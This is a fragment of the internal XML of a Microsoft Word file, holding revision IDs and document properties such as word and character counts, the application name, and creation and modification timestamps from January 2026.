    <w:rsid w:val="000B6242"/>
    <w:rsid w:val="0054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BE7AF-38A9-42B6-9C4F-EC593BF0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0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E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0E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E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0E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0E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E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0E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4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4478</Words>
  <Characters>25530</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>212</Lines>
  <Paragraphs>59</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>29949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2026-01-02T05:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-02T05:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>